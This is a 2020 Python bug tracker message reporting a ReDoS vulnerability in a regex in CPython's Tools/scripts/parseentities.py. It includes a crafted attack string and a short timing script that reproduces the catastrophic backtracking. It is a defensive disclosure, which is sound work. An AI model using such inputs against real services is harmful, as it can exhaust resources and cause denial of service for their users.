This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author yetingli
Recipients yetingli
Date 2020-10-03.15:12:49
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1601737969.46.0.495788645161.issue41921@roundup.psfhosted.org>
In-reply-to
Content
Hi,

I find this regex '<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- +((?:.|\n)+?) *-->' may be stucked by input.
The vulnerable regex is located in
https://github.com/python/cpython/blob/8d21aa21f2cbc6d50aab3f420bb23be1d081dac4/Tools/scripts/parseentities.py#L18

The ReDOS vulnerability of the regex is mainly due to the sub-pattern ' +((?:.|\n)+?) *'
and can be exploited with the following string
'<!ENTITY a CDATA "a" -- ' + ' ' * 5000

You can execute the following code to reproduce ReDos


from Tools.scripts.parseentities import parse
from time import perf_counter

for i in range(0, 10000):
    ATTACK = '<!ENTITY a CDATA "a" -- ' + ' ' * i * 100
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    parse(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{LEN}: took {DURATION} seconds!")





Looking forward for your response​!

Best,
Yeting Li
History
Date User Action Args
2020-10-03 15:12:49yetinglisetrecipients: + yetingli
2020-10-03 15:12:49yetinglisetmessageid: <1601737969.46.0.495788645161.issue41921@roundup.psfhosted.org>
2020-10-03 15:12:49yetinglilinkissue41921 messages
2020-10-03 15:12:49yetinglicreate